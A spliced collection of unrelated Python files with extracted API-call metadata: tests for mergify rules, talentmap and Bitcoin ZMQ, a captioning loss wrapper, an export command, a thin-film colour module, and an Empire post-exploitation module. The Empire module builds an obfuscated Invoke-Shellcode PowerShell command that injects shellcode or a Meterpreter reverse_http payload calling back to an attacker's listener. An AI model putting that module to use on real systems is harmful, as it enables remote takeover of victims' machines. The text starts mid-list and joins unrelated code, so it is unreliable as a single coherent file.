'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': ['author~=^(user1|user2|another-jd)$'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'author~=^(user1|user2|another-jd)$'], 'actions': {}}])\n", (18775, 18872), False, 'from mergify_engine import rules\n'), ((898, 931), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (911, 931), False, 'import pytest\n'), ((941, 985), 'mergify_engine.rules.PullRequestRuleCondition', 'rules.PullRequestRuleCondition', (['"""head~=(bar"""'], {}), "('head~=(bar')\n", (971, 985), False, 'from mergify_engine import rules\n'), ((1772, 2134), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n - name: ahah\n conditions:\n - base=master\n actions:\n comment:\n message: |\n This pull request has been approved by:\n {% for name in approved_reviews_by %}\n @{{name}}\n {% endfor %}\n Thank you @{{author}} for your contributions!\n\n"""'], {}), '(\n """\npull_request_rules:\n - name: ahah\n conditions:\n - base=master\n actions:\n comment:\n message: |\n This pull request has been approved by:\n {% for name in approved_reviews_by %}\n @{{name}}\n {% endfor %}\n Thank you @{{author}} for your contributions!\n\n"""\n )\n', (1801, 2134), False, 'from mergify_engine import rules\n'), ((2294, 2327), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (2307, 2327), False, 'import pytest\n'), ((2349, 2393), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""- no\n* way"""'], {}), "('- no\\n* way')\n", (2378, 2393), False, 'from mergify_engine import rules\n'), ((2475, 2508), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (2488, 2508), False, 'import pytest\n'), ((2523, 2643), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n - name: ahah\n key: not really what we expected\n"""'], {}), '(\n """\npull_request_rules:\n - name: ahah\n key: not really what we expected\n"""\n )\n', (2552, 2643), False, 'from mergify_engine import rules\n'), ((3152, 3185), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (3165, 3185), False, 'import pytest\n'), ((3200, 3254), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""invalid:\n- *yaml\n"""'], {}), '("""invalid:\n- *yaml\n""")\n', (3229, 3254), False, 'from mergify_engine import rules\n'), ((4067, 4100), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (4080, 4100), False, 'import pytest\n'), ((4115, 4173), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n"""'], {}), '("""\npull_request_rules:\n""")\n', (4144, 4173), False, 'from mergify_engine import rules\n'), ((4325, 4358), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (4338, 4358), False, 'import pytest\n'), ((4373, 4406), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['""""""'], {}), "('')\n", (4402, 4406), False, 'from mergify_engine import rules\n'), ((7033, 7087), 'pytest.raises', 'pytest.raises', (['voluptuous.MultipleInvalid'], {'match': 'match'}), '(voluptuous.MultipleInvalid, match=match)\n', (7046, 7087), False, 'import pytest\n'), ((7097, 7140), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (['[invalid]'], {}), '([invalid])\n', (7129, 7140), False, 'from mergify_engine import rules\n')]
|
import pytest
from model_mommy import mommy
from talentmap_api.language.models import Qualification
@pytest.fixture
def test_language_model_fixture():
# Create a specific language, and set of proficiency, and qualification
mommy.make('language.Language', code="DE", long_description="German", short_description="Ger")
mommy.make('language.Proficiency', code="3+")
mommy.make('language.Proficiency', code="3")
@pytest.mark.django_db()
def test_proficiency_comparisons():
p1 = mommy.make('language.Proficiency', id=1, code='3+')
p2 = p1
p3 = mommy.make('language.Proficiency', id=2, code='X')
p4 = mommy.make('language.Proficiency', id=3, code='2')
assert p1 >= p2
assert p1 <= p2
assert p1 > p3
assert p1 > p4
assert p4 <= p2
assert p4 > p3
assert p3 < p4
@pytest.mark.django_db()
@pytest.mark.usefixtures("test_language_model_fixture")
def test_qualification_get_or_create_by_codes():
qual, created = Qualification.get_or_create_by_codes("DE", "3+", "3")
assert created
assert qual.language.code == "DE"
assert qual.reading_proficiency.code == "3+"
assert qual.spoken_proficiency.code == "3"
qual, created = Qualification.get_or_create_by_codes("DE", "3+", "3")
assert not created
assert qual.language.code == "DE"
assert qual.reading_proficiency.code == "3+"
assert qual.spoken_proficiency.code == "3"
|
[
"model_mommy.mommy.make",
"pytest.mark.usefixtures",
"talentmap_api.language.models.Qualification.get_or_create_by_codes",
"pytest.mark.django_db"
] |
[((432, 455), 'pytest.mark.django_db', 'pytest.mark.django_db', ([], {}), '()\n', (453, 455), False, 'import pytest\n'), ((825, 848), 'pytest.mark.django_db', 'pytest.mark.django_db', ([], {}), '()\n', (846, 848), False, 'import pytest\n'), ((850, 904), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""test_language_model_fixture"""'], {}), "('test_language_model_fixture')\n", (873, 904), False, 'import pytest\n'), ((235, 333), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Language"""'], {'code': '"""DE"""', 'long_description': '"""German"""', 'short_description': '"""Ger"""'}), "('language.Language', code='DE', long_description='German',\n short_description='Ger')\n", (245, 333), False, 'from model_mommy import mommy\n'), ((334, 379), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'code': '"""3+"""'}), "('language.Proficiency', code='3+')\n", (344, 379), False, 'from model_mommy import mommy\n'), ((384, 428), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'code': '"""3"""'}), "('language.Proficiency', code='3')\n", (394, 428), False, 'from model_mommy import mommy\n'), ((501, 552), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(1)', 'code': '"""3+"""'}), "('language.Proficiency', id=1, code='3+')\n", (511, 552), False, 'from model_mommy import mommy\n'), ((574, 624), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(2)', 'code': '"""X"""'}), "('language.Proficiency', id=2, code='X')\n", (584, 624), False, 'from model_mommy import mommy\n'), ((634, 684), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(3)', 'code': '"""2"""'}), "('language.Proficiency', id=3, code='2')\n", (644, 684), False, 'from model_mommy import mommy\n'), ((974, 1027), 'talentmap_api.language.models.Qualification.get_or_create_by_codes', 'Qualification.get_or_create_by_codes', (['"""DE"""', '"""3+"""', '"""3"""'], {}), "('DE', '3+', '3')\n", (1010, 1027), False, 'from talentmap_api.language.models import Qualification\n'), ((1203, 1256), 'talentmap_api.language.models.Qualification.get_or_create_by_codes', 'Qualification.get_or_create_by_codes', (['"""DE"""', '"""3+"""', '"""3"""'], {}), "('DE', '3+', '3')\n", (1239, 1256), False, 'from talentmap_api.language.models import Qualification\n')]
|
import csv
with open('TheCure_Discography.csv') as f:
f_csv = csv.reader(f, delimiter=';')
headers = next(f_csv)
for row in filter(
lambda l: "Fiction Records" in l[1] and 1980 <= int(l[2]) <= 1989,
f_csv
):
print(row)
|
[
"csv.reader"
] |
[((66, 94), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '""";"""'}), "(f, delimiter=';')\n", (76, 94), False, 'import csv\n')]
|
import torch
import torch.nn as nn
import misc.utils as utils
from misc.rewards import init_scorer, get_self_critical_reward
import torch.nn.functional as F
class LossWrapper(torch.nn.Module):
def __init__(self, model, opt):
super(LossWrapper, self).__init__()
self.opt = opt
self.model = model
if opt.label_smoothing > 0:
self.crit = utils.LabelSmoothing(smoothing=opt.label_smoothing)
else:
self.crit = utils.LanguageModelCriterion()
self.rl_crit = utils.RewardCriterion()
self.class_criterion = nn.BCELoss()
self.KL = nn.KLDivLoss(reduction='sum')
self.log_soft = nn.LogSoftmax()
def relation(self, input):
distance = []
input = input.reshape(10, 4, 80) # (b_s, augmentation, 80)
for tmp_input in input:
flag = tmp_input[0]
tmp_distance = []
for i in range(len(tmp_input)):
for tmp in tmp_input[i + 1:]:
tmp_distance.append(-torch.norm(flag - tmp))
distance.append(torch.stack(tmp_distance))
soft_dis = torch.nn.functional.softmax(torch.stack(distance))
return soft_dis
def forward(self, fc_feats, att_feats, labels, class_label, masks, att_masks, gts, gt_indices,
sc_flag):
out = {}
fc_feats = fc_feats.reshape(10, -1)
att_feats = att_feats.reshape(10, -1)
_, encoder_output, decoder_output = self.model(fc_feats, att_feats, labels, att_masks)
decoder_output = decoder_output.squeeze() # (b_s, 80)
# encoder_output, decoder_output: (b_s*per_image, 80)
if not sc_flag:
loss = self.crit(self.model(fc_feats, att_feats, labels, att_masks)[0], labels[:,1:], masks[:,1:])
# label classfication
img_loss = self.class_criterion(encoder_output, class_label)
cap_loss = self.class_criterion(decoder_output, class_label)
# unlabel classfication
img_cls = encoder_output.masked_fill(encoder_output > 0.7, 1) # (b_s*per_image, 80)
img_cls = img_cls.masked_fill(img_cls <= 0.7, 0) # (b_s*per_image, 80)
unlabel_loss = self.class_criterion(decoder_output, img_cls)
# realtion and tao
decoder_output = decoder_output.masked_fill(decoder_output < 0.1, 0)
encoder_output = encoder_output.masked_fill(decoder_output < 0.1, 0)
img_kl = self.relation(encoder_output)
cap_kl = self.relation(decoder_output)
kl_loss = F.kl_div(cap_kl.log(), img_kl, reduction='sum')
print('img_loss: {}, cap_loss: {}, kl_loss: {}, unlabel_loss: {}'.format(img_loss.item(),
cap_loss.item(),
unlabel_loss.item(),
kl_loss.item()))
out['loss'] = loss + (img_loss + cap_loss) + kl_loss
else:
self.model.eval()
with torch.no_grad():
greedy_res, _ = self.model(fc_feats, att_feats, att_masks, mode='sample')
self.model.train()
gen_result, sample_logprobs = self.model(fc_feats, att_feats, att_masks, opt={'sample_method':'sample'}, mode='sample')
gts = [gts[_] for _ in gt_indices.tolist()]
reward = get_self_critical_reward(greedy_res, gts, gen_result, self.opt)
reward = torch.from_numpy(reward).float().to(gen_result.device)
loss = self.rl_crit(sample_logprobs, gen_result.data, reward)
out['reward'] = reward[:,0].mean()
out['loss'] = loss
return out
|
[
"torch.nn.BCELoss",
"torch.stack",
"torch.nn.LogSoftmax",
"misc.utils.LanguageModelCriterion",
"torch.nn.KLDivLoss",
"torch.norm",
"misc.rewards.get_self_critical_reward",
"misc.utils.LabelSmoothing",
"torch.no_grad",
"misc.utils.RewardCriterion",
"torch.from_numpy"
] |
[((529, 552), 'misc.utils.RewardCriterion', 'utils.RewardCriterion', ([], {}), '()\n', (550, 552), True, 'import misc.utils as utils\n'), ((585, 597), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (595, 597), True, 'import torch.nn as nn\n'), ((616, 645), 'torch.nn.KLDivLoss', 'nn.KLDivLoss', ([], {'reduction': '"""sum"""'}), "(reduction='sum')\n", (628, 645), True, 'import torch.nn as nn\n'), ((670, 685), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {}), '()\n', (683, 685), True, 'import torch.nn as nn\n'), ((385, 436), 'misc.utils.LabelSmoothing', 'utils.LabelSmoothing', ([], {'smoothing': 'opt.label_smoothing'}), '(smoothing=opt.label_smoothing)\n', (405, 436), True, 'import misc.utils as utils\n'), ((475, 505), 'misc.utils.LanguageModelCriterion', 'utils.LanguageModelCriterion', ([], {}), '()\n', (503, 505), True, 'import misc.utils as utils\n'), ((1161, 1182), 'torch.stack', 'torch.stack', (['distance'], {}), '(distance)\n', (1172, 1182), False, 'import torch\n'), ((3522, 3585), 'misc.rewards.get_self_critical_reward', 'get_self_critical_reward', (['greedy_res', 'gts', 'gen_result', 'self.opt'], {}), '(greedy_res, gts, gen_result, self.opt)\n', (3546, 3585), False, 'from misc.rewards import init_scorer, get_self_critical_reward\n'), ((1086, 1111), 'torch.stack', 'torch.stack', (['tmp_distance'], {}), '(tmp_distance)\n', (1097, 1111), False, 'import torch\n'), ((3175, 3190), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3188, 3190), False, 'import torch\n'), ((1033, 1055), 'torch.norm', 'torch.norm', (['(flag - tmp)'], {}), '(flag - tmp)\n', (1043, 1055), False, 'import torch\n'), ((3607, 3631), 'torch.from_numpy', 'torch.from_numpy', (['reward'], {}), '(reward)\n', (3623, 3631), False, 'import torch\n')]
|
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "\nInvoke-Shellcode -Force"
listener_name = params['Listener']
if listener_name != "":
if not main_menu.listeners.is_listener_valid(listener_name):
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# TODO: redo pulling these listener configs...
# Old method no longer working
# temporary fix until a more elegant solution is in place, unless this is the most elegant???? :)
# [ID,name,host,port,cert_path,staging_key,default_delay,default_jitter,default_profile,kill_date,working_hours,listener_type,redirect_target,default_lost_limit] = main_menu.listeners.get_listener(listener_name)
host = main_menu.listeners.loadedListeners['meterpreter'].options['Host']
port = main_menu.listeners.loadedListeners['meterpreter'].options['Port']
MSFpayload = "reverse_http"
if "https" in host:
MSFpayload += "s"
hostname = host.split(":")[1].strip("/")
params['Lhost'] = str(hostname)
params['Lport'] = str(port)
params['Payload'] = str(MSFpayload)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener":
if values and values != '':
if option.lower() == "payload":
payload = "windows/meterpreter/" + str(values)
script_end += " -" + str(option) + " " + payload
elif option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[0:]
script_end += " -" + str(option) + " @(" + sc + ")"
elif option.lower() == "file":
with open(f"{main_menu.installPath}/downloads/{values}", 'rb') as bin_data:
shellcode_bin_data = bin_data.read()
sc = ''
for x in range(len(shellcode_bin_data)):
sc += "0x{:02x}".format(shellcode_bin_data[x]) + ','
script_end += f' -shellcode @({sc[:-1]})'
else:
script_end += " -" + str(option) + " " + str(values)
script_end += "; 'Shellcode injected.'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
[
"empire.server.utils.data_util.keyword_obfuscation",
"empire.server.utils.data_util.obfuscate",
"pathlib.Path",
"empire.server.utils.module_util.handle_error_message",
"builtins.str"
] |
[((4198, 4235), 'empire.server.utils.data_util.keyword_obfuscation', 'data_util.keyword_obfuscation', (['script'], {}), '(script)\n', (4227, 4235), False, 'from empire.server.utils import data_util\n'), ((1274, 1401), 'empire.server.utils.data_util.obfuscate', 'data_util.obfuscate', ([], {'installPath': 'main_menu.installPath', 'psScript': 'module_code', 'obfuscationCommand': 'main_menu.obfuscateCommand'}), '(installPath=main_menu.installPath, psScript=module_code,\n obfuscationCommand=main_menu.obfuscateCommand)\n', (1293, 1401), False, 'from empire.server.utils import data_util\n'), ((4041, 4155), 'empire.server.utils.data_util.obfuscate', 'data_util.obfuscate', (['main_menu.installPath'], {'psScript': 'script_end', 'obfuscationCommand': 'main_menu.obfuscateCommand'}), '(main_menu.installPath, psScript=script_end,\n obfuscationCommand=main_menu.obfuscateCommand)\n', (4060, 4155), False, 'from empire.server.utils import data_util\n'), ((1708, 1770), 'empire.server.utils.module_util.handle_error_message', 'handle_error_message', (["('[!] Invalid listener: ' + listener_name)"], {}), "('[!] Invalid listener: ' + listener_name)\n", (1728, 1770), False, 'from empire.server.utils.module_util import handle_error_message\n'), ((2632, 2645), 'builtins.str', 'str', (['hostname'], {}), '(hostname)\n', (2635, 2645), False, 'from builtins import str\n'), ((2680, 2689), 'builtins.str', 'str', (['port'], {}), '(port)\n', (2683, 2689), False, 'from builtins import str\n'), ((2726, 2741), 'builtins.str', 'str', (['MSFpayload'], {}), '(MSFpayload)\n', (2729, 2741), False, 'from builtins import str\n'), ((832, 870), 'pathlib.Path', 'pathlib.Path', (['obfuscated_module_source'], {}), '(obfuscated_module_source)\n', (844, 870), False, 'import pathlib\n'), ((1143, 1161), 'builtins.str', 'str', (['module_source'], {}), '(module_source)\n', (1146, 1161), False, 'from builtins import str\n'), ((1203, 1241), 'pathlib.Path', 'pathlib.Path', (['obfuscated_module_source'], {}), '(obfuscated_module_source)\n', (1215, 1241), False, 'import pathlib\n'), ((3019, 3030), 'builtins.str', 'str', (['values'], {}), '(values)\n', (3022, 3030), False, 'from builtins import str\n'), ((3076, 3087), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3079, 3087), False, 'from builtins import str\n'), ((3922, 3933), 'builtins.str', 'str', (['values'], {}), '(values)\n', (3925, 3933), False, 'from builtins import str\n'), ((3340, 3351), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3343, 3351), False, 'from builtins import str\n'), ((3902, 3913), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3905, 3913), False, 'from builtins import str\n')]
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the ZMQ notification interface."""
import configparser
import os
import struct
from test_framework.test_framework import BitcoinTestFramework, SkipTest
from test_framework.mininode import CTransaction
from test_framework.util import (assert_equal,
bytes_to_hex_str,
hash256,
)
from io import BytesIO
class ZMQSubscriber:
def __init__(self, socket, topic):
self.sequence = 0
self.socket = socket
self.topic = topic
import zmq
self.socket.setsockopt(zmq.SUBSCRIBE, self.topic)
def receive(self):
topic, body, seq = self.socket.recv_multipart()
# Topic should match the subscriber topic.
assert_equal(topic, self.topic)
# Sequence should be incremental.
assert_equal(struct.unpack('<I', seq)[-1], self.sequence)
self.sequence += 1
return body
class ZMQTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_nodes(self):
# Try to import python3-zmq. Skip this test if the import fails.
try:
import zmq
except ImportError:
raise SkipTest("python3-zmq module not available.")
# Check that bitcoin has been built with ZMQ enabled.
config = configparser.ConfigParser()
if not self.options.configfile:
self.options.configfile = os.path.abspath(os.path.join(os.path.dirname(__file__), "../config.ini"))
config.read_file(open(self.options.configfile))
if not config["components"].getboolean("ENABLE_ZMQ"):
raise SkipTest("catecoind has not been built with zmq enabled.")
# Initialize ZMQ context and socket.
# All messages are received in the same socket which means
# that this test fails if the publishing order changes.
# Note that the publishing order is not defined in the documentation and
# is subject to change.
address = "tcp://127.0.0.1:28332"
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.SUB)
socket.set(zmq.RCVTIMEO, 60000)
socket.connect(address)
# Subscribe to all available topics.
self.hashblock = ZMQSubscriber(socket, b"hashblock")
self.hashtx = ZMQSubscriber(socket, b"hashtx")
self.rawblock = ZMQSubscriber(socket, b"rawblock")
self.rawtx = ZMQSubscriber(socket, b"rawtx")
self.extra_args = [["-zmqpub%s=%s" % (sub.topic.decode(), address) for sub in [self.hashblock, self.hashtx, self.rawblock, self.rawtx]], []]
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
try:
self._zmq_test()
finally:
# Destroy the ZMQ context.
self.log.debug("Destroying ZMQ context")
self.zmq_context.destroy(linger=None)
def _zmq_test(self):
num_blocks = 5
self.log.info("Generate %(n)d blocks (and %(n)d coinbase txes)" % {"n": num_blocks})
genhashes = self.nodes[0].generate(num_blocks)
self.sync_all()
for x in range(num_blocks):
# Should receive the coinbase txid.
txid = self.hashtx.receive()
# Should receive the coinbase raw transaction.
hex = self.rawtx.receive()
tx = CTransaction()
tx.deserialize(BytesIO(hex))
tx.calc_sha256()
assert_equal(tx.hash, bytes_to_hex_str(txid))
# Should receive the generated block hash.
hash = bytes_to_hex_str(self.hashblock.receive())
assert_equal(genhashes[x], hash)
# The block should only have the coinbase txid.
assert_equal([bytes_to_hex_str(txid)], self.nodes[1].getblock(hash)["tx"])
# Should receive the generated raw block.
block = self.rawblock.receive()
assert_equal(genhashes[x], bytes_to_hex_str(hash256(block[:80])))
self.log.info("Wait for tx from second node")
payment_txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# Should receive the broadcasted txid.
txid = self.hashtx.receive()
assert_equal(payment_txid, bytes_to_hex_str(txid))
# Should receive the broadcasted raw transaction.
hex = self.rawtx.receive()
assert_equal(payment_txid, bytes_to_hex_str(hash256(hex)))
if __name__ == '__main__':
ZMQTest().main()
|
[
"test_framework.test_framework.SkipTest",
"test_framework.mininode.CTransaction",
"test_framework.util.bytes_to_hex_str",
"io.BytesIO",
"test_framework.util.hash256",
"os.path.dirname",
"struct.unpack",
"configparser.ConfigParser",
"test_framework.util.assert_equal",
"zmq.Context"
] |
[((981, 1012), 'test_framework.util.assert_equal', 'assert_equal', (['topic', 'self.topic'], {}), '(topic, self.topic)\n', (993, 1012), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1575, 1602), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1600, 1602), False, 'import configparser\n'), ((2310, 2323), 'zmq.Context', 'zmq.Context', ([], {}), '()\n', (2321, 2323), False, 'import zmq\n'), ((1892, 1950), 'test_framework.test_framework.SkipTest', 'SkipTest', (['"""catecoind has not been built with zmq enabled."""'], {}), "('catecoind has not been built with zmq enabled.')\n", (1900, 1950), False, 'from test_framework.test_framework import BitcoinTestFramework, SkipTest\n'), ((3642, 3656), 'test_framework.mininode.CTransaction', 'CTransaction', ([], {}), '()\n', (3654, 3656), False, 'from test_framework.mininode import CTransaction\n'), ((3915, 3947), 'test_framework.util.assert_equal', 'assert_equal', (['genhashes[x]', 'hash'], {}), '(genhashes[x], hash)\n', (3927, 3947), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4558, 4580), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (4574, 4580), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1076, 1100), 'struct.unpack', 'struct.unpack', (['"""<I"""', 'seq'], {}), "('<I', seq)\n", (1089, 1100), False, 'import struct\n'), ((1449, 1494), 'test_framework.test_framework.SkipTest', 'SkipTest', (['"""python3-zmq module not available."""'], {}), "('python3-zmq module not available.')\n", (1457, 1494), False, 'from test_framework.test_framework import BitcoinTestFramework, SkipTest\n'), ((3684, 3696), 'io.BytesIO', 'BytesIO', (['hex'], {}), '(hex)\n', (3691, 3696), False, 'from io import BytesIO\n'), ((3761, 3783), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (3777, 3783), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4728, 4740), 'test_framework.util.hash256', 'hash256', (['hex'], {}), '(hex)\n', (4735, 4740), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1710, 1735), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1725, 1735), False, 'import os\n'), ((4034, 4056), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (4050, 4056), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4250, 4269), 'test_framework.util.hash256', 'hash256', (['block[:80]'], {}), '(block[:80])\n', (4257, 4269), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n')]
|
'''
Manage command to export intervention data for use by others.
Generates a CSV and JSON file with details for all interventions
documented in the database.
Takes an optional argument to specify the output directory. Otherwise,
files are created in the current directory.
'''
import codecs
from collections import OrderedDict
import csv
import json
import os.path
from derrida.books.management.commands import reference_data
from derrida.interventions.models import Intervention
class Command(reference_data.Command):
'''Export intervention data from the database as CSV and JSON'''
help = __doc__
# NOTE: extending reference_data manage command to inherit
# flatten_data method; there is more overlap and these scripts
# could probably be generalized further for re-use
#: fields for CSV output
csv_fields = [
'id', 'book id', 'book title', 'book type', 'page', 'tags', 'text content',
'text language', 'text language code', 'text translation',
'quote content', 'quote language', 'quote language code', 'annotator'
]
#: base filename, for CSV and JSON output
base_filename = 'interventions'
def add_arguments(self, parser):
parser.add_argument(
'-d', '--directory',
help='Specify the directory where files should be generated')
def handle(self, *args, **kwargs):
if kwargs['directory']:
self.base_filename = os.path.join(kwargs['directory'], self.base_filename)
# aggregate intervention data to be exported for use in generating
# CSV and JSON output
data = [self.intervention_data(intervention)
for intervention in Intervention.objects.all()]
# list of dictionaries can be output as is for JSON export
with open('{}.json'.format(self.base_filename), 'w') as jsonfile:
json.dump(data, jsonfile, indent=2)
# generate CSV export
with open('{}.csv'.format(self.base_filename), 'w') as csvfile:
# write utf-8 byte order mark at the beginning of the file
csvfile.write(codecs.BOM_UTF8.decode())
csvwriter = csv.DictWriter(csvfile, fieldnames=self.csv_fields)
csvwriter.writeheader()
for intervention in data:
csvwriter.writerow(self.flatten_dict(intervention))
def intervention_data(self, intervention):
'''Generate a dictionary of data to export for a single
:class:`~derrida.books.models.Reference` object'''
# NOTE: using OrderedDict to ensure JSON output follows logical
# order in Python < 3.6, where dict order is not guaranteed
data = OrderedDict([
('id', intervention.get_uri()),
# every intervention *should* be associated with a book,
# but possible that some are not
('book', OrderedDict([
('id', intervention.work_instance.get_uri() if intervention.work_instance else ''),
('title', intervention.work_instance.display_title() if intervention.work_instance else ''),
('type', intervention.work_instance.item_type if intervention.work_instance else '')
])),
# canvas object *should* have a label, but possible it does not
('page', intervention.canvas.label if intervention.canvas else ''),
('tags', [tag.name for tag in intervention.tags.all()])
])
# only include text and quote information if we have content
if intervention.text:
text_info = OrderedDict({
'content': intervention.text
})
if intervention.text_language:
text_info['language'] = intervention.text_language.name
text_info['language code'] = intervention.text_language.code
if intervention.text_translation:
text_info['translation'] = intervention.text_translation
data['text'] = text_info
if intervention.quote:
quote_info = OrderedDict({
'content': intervention.quote
})
if intervention.quote_language:
quote_info['language'] = intervention.quote_language.name
quote_info['language code'] = intervention.quote_language.code
data['quote'] = quote_info
if intervention.author:
data['annotator'] = intervention.author.authorized_name
return data
|
[
"json.dump",
"csv.DictWriter",
"derrida.interventions.models.Intervention.objects.all",
"collections.OrderedDict",
"codecs.BOM_UTF8.decode"
] |
[((1883, 1918), 'json.dump', 'json.dump', (['data', 'jsonfile'], {'indent': '(2)'}), '(data, jsonfile, indent=2)\n', (1892, 1918), False, 'import json\n'), ((2170, 2221), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.csv_fields'}), '(csvfile, fieldnames=self.csv_fields)\n', (2184, 2221), False, 'import csv\n'), ((3586, 3629), 'collections.OrderedDict', 'OrderedDict', (["{'content': intervention.text}"], {}), "({'content': intervention.text})\n", (3597, 3629), False, 'from collections import OrderedDict\n'), ((4066, 4110), 'collections.OrderedDict', 'OrderedDict', (["{'content': intervention.quote}"], {}), "({'content': intervention.quote})\n", (4077, 4110), False, 'from collections import OrderedDict\n'), ((1701, 1727), 'derrida.interventions.models.Intervention.objects.all', 'Intervention.objects.all', ([], {}), '()\n', (1725, 1727), False, 'from derrida.interventions.models import Intervention\n'), ((2119, 2143), 'codecs.BOM_UTF8.decode', 'codecs.BOM_UTF8.decode', ([], {}), '()\n', (2141, 2143), False, 'import codecs\n')]
|
# -*- coding: utf-8 -*-
"""
Functions to calculate the color of a multilayer thin film under reflected
light. A perfect mirror will look white, because we imagine seeing the white
light source ("illuminant") reflected in it. A half-reflective mirror will be
gray, a non-reflective surface will be black, etc. See tmm.examples.sample5()
for a few example calculations for how this is used.
For functions that require an illuminant, the most common choice would be to
use colorpy.illuminants.get_illuminant_D65(), which approximates a phase of
natural daylight. See http://en.wikipedia.org/wiki/Illuminant_D65 .
"""
from __future__ import division, print_function, absolute_import
from numpy import arange, array
import numpy as np
from .tmm_core import coh_tmm
try:
import colorpy
import colorpy.illuminants
import colorpy.ciexyz
except ImportError:
print('Warning: Colorpy not detected (or perhaps an error occurred when',
'loading it). Film color calculations (in tmm.color)',
'will not work. Main version is at http://pypi.python.org/pypi/colorpy',
'A Python 3 compatible edit is at https://github.com/fish2000/ColorPy/')
inf = float('inf')
def calc_reflectances(n_fn_list, d_list, th_0, pol='s', spectral_range='narrow'):
"""
Calculate the reflection spectrum of a thin-film stack.
n_fn_list[m] should be a function that inputs wavelength in nm and
outputs refractive index of the m'th layer. In other words,
n_fn_list[2](456) == 1.53 + 0.4j mans that layer #2 has a refractive index
of 1.53 + 0.4j at 456nm. These functions could be defined with
scipy.interpolate.interp1d() for example.
pol, d_list and th_0 are defined as in tmm.coh_tmm ... but d_list
MUST be in units of nanometers
spectral_range can be 'full' if all the functions in n_fn_list can take
wavelength arguments between 360-830nm; or 'narrow' if some or all require
arguments only in the range 400-700nm. The wavelengths outside the
